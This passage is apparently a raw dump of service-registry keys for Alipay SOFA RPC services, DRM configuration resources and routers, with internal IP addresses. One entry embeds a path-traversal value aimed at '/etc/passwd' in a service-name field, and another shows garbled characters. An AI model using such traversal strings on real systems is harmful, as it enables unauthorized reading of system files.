DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.condition.RuleConditionQueryService:1.0:promo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.biz.shared.search.MerchantShopCategorySearch:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.248.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.43.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJiebeiPledgeCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.184.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_LOAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.issue.FundIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lisa.data.hub.api.LisaDataHubAccess:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:test涓�涓�@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.SceneRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.cache.RunningInfoService:1.0:superlink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_ASSETXP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_ALI_TP_S_BC_YOUKU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.sdk.risk.bizchgdefense.spi.BizCheckRuleQueryFacade:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.176.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.membertangram.common.service.facade.component.ComponentConfigFacade:1.0:membertangram@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanlend.common.service.facade.api.apply.LendApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.128.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.facade.validator.DecisionLogQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAckCodeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.OperationRecordOpenApiFacade:1.0:ALIPAY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.openpunish.OpenPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.certdoc.common.facade.UserCertDocService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArInvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.campaign.CampaignInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.SparkTableCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.facade.api.management.activity.RateActivityMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.behavior.service.AutoMktBehaviorFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.task.VcpTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.OAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.RehabInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alplatform.common.service.facade.api.ProcessCallBack:1.0:alplatformCallBackTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.audit.biz.manager.fuse.drm.FusePracticeConfigResource.techPractice,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.promoRuleCenterCrowdMatchSceneSetStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.feeds.FeedsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdTopicInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.167.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.oss.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.mayibank.StatusManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.csplatform.service.MemberBenefitConfigCSPlatformQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.sdk.change.callback.OpsChngServiceCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.channelspop.service.decision.opportunity.facade.OpportunityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.GoodsPriceConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.comparacenter.common.service.facade.manage.api.template.ComParaMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:NEWRULEVELOCITY@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmobileappcommon.common.service.testgo.install.InstallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_modifyCertNoAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.HsmRsaCryptoFacade:1.0:fccryptprod.boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zmbusinessbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.cooperate.api.AccorderCooperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.OnlineExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.ValidateRecordServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:cashbackcard.compute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.TableInstanceCalService:1.0:bkfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bis.common.service.facade.face.FacePictureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.lendpofprod.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.215.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insrenewprod.common.service.facade.api.renewal.InsRenewalInsureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxrouter.common.service.facade.api.ChannelAbilityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.virtualprod.common.service.facade.lottery.LotteryOrgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.sign.UserSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FreezeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:auditCancelExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:json-render-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IKBSERVCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_PCACTIVITYCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.databus.common.manage.facade.RouteReplayManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:hainaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.api.DataDecisionService:1.0:myddscode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.RefundReceiptService:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_Y_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousAcceptanceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.accouting.titlerealtimebalance.TitleRealtimeBalanceFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCenterCodeVersionDrm.fileGenVersionValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.180.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minicenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.ssucode.PcInstSsuCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.asset.AssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:DASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.emergencytask.ClvEmergencyTaskService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ioteds.schema.api.SchemaChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.retryTimesStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.zskynet.zdalExplorerDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.info.InstInfoService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.platform.AppAdManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.query.UserSigningQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.core.service.framework.itask.plugin.manager.TaskPluginManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_M_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.globalBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FileBridgeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.BudgetBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbusinessprod.common.service.facade.api.FuBeiBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.searchapp.api.SearchAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.FreeAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.wishTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsoc.service.facade.api.config.center.ResourceDeployQueryService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.FintradeInstSignContractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.articlesync.facade.BasicArticleSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FPORGASSETSWAP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.BotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.news.shared.channelnews.ProductBigEventService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bketencip.common.service.facade.api.EtenGatewayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcloanmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.grsettle.facade.multi.api.budget.GrstlMultiTypeBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.TitleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.alm.service.facade.facade.MbloanWebFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmInstanceSyncTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.TrainStationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.scene.SceneContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.matcherauth.MatcherAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.transmitIndicatorExcludeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_AUTO_WRITEOFF_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILETMS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finquotationcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.199.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:imerchopmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datafin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterUserGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.tag.KbTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.190.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.234.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recon.common.service.facade.fund.api.TTReconResultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamweb.common.service.facade.common.IamWebSystemParamsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:apfundprod_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pushcore.facade.PushRulesetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PLEDGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.qa.QaDynamicConfHandlerFacade:1.0:mservice_dynamicConfToolForSignHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopBrandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.secretcard.api.SecretCardQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.anteye.SentimentAntEyeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.174.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.actrule.ActRuleDomainMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArAdvanceReceivableBalanceLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.execute.RetryOrderDRMResource.threadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.search.api.SearchWordPackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.res.ManagedRoleService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findefencecore.common.service.starfish.facade.StarfishTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCircleFeedService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.BenefitOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.DispositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.activity.PaymentResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfaccenter.facade.api.SubLedgerTbAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acordercore.common.service.facade.rest.ArOperationSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.glibra.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.alphasecmng:name=com.alipay.assay.semantic.drm.KnowledgeGreyResource.flowGreyingEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.17.166.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icsmng.service.facade.customer.card.UserBindCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.darwinEntrance,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.fundtrans.FundtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schedulerweb.service.facade.operate.TaskStatusManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.greppublish.GreyPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.security.SecurityOpenGWFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:loanpromoweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.extend.MerchantExtendActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:fincommontaskhub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeexprod.common.service.facade.FpQueryRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yuyan.deploy.TRWrapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundFixedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ResourcePoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.126.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantTicketApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpPlanMngFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.rwCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.imif.common.service.facade.api.MerchantProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:jiuzhou@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AuthTokenManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Holox_BlackSampleUrlCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.executor.facade.admin.ExecutorMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ServerConsistencyCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.nebula.MobileAppStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfinvest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.CZRouteSetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.parkinglot.admin.ParkingLotAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.143.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdsri